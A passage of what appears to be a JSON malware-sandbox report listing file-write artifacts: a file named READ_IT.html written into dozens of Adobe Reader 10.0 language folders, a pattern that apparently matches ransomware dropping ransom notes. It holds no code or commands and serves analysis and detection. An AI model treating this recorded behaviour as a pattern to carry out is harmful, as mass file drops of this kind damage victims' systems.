10.0\\reader\\plug_ins\\annotations\\stamps\\pol\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nor\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nld\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\kor\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\jpn\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ita\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hun\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hrv\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\fra\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\euq\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ESP\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\esp\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ENU\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\enu\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DEU\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\deu\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DAN\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\dan\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cze\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cht\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\chs\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cat\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\PMP\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform\\pmp\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Services\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\services\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\UKR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ukr\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\TUR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\tur\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SVE\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\sve\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\suo\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SLV\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\slv\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SKY\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\sky\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUS\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\rus\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\rum\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\PTB\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ptb\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\POL\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\pol\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NOR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\nor\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NLD\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\nld\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\KOR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\kor\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\JPN\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\jpn\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ITA\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ita\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\hun\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HRV\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\hrv\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\FRA\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\fra\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\EUQ\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\euq\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ESP\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\esp\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ENU\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\enu\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DEU\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\deu\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DAN\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\dan\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CZE\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cze\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHT\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cht\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHS\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 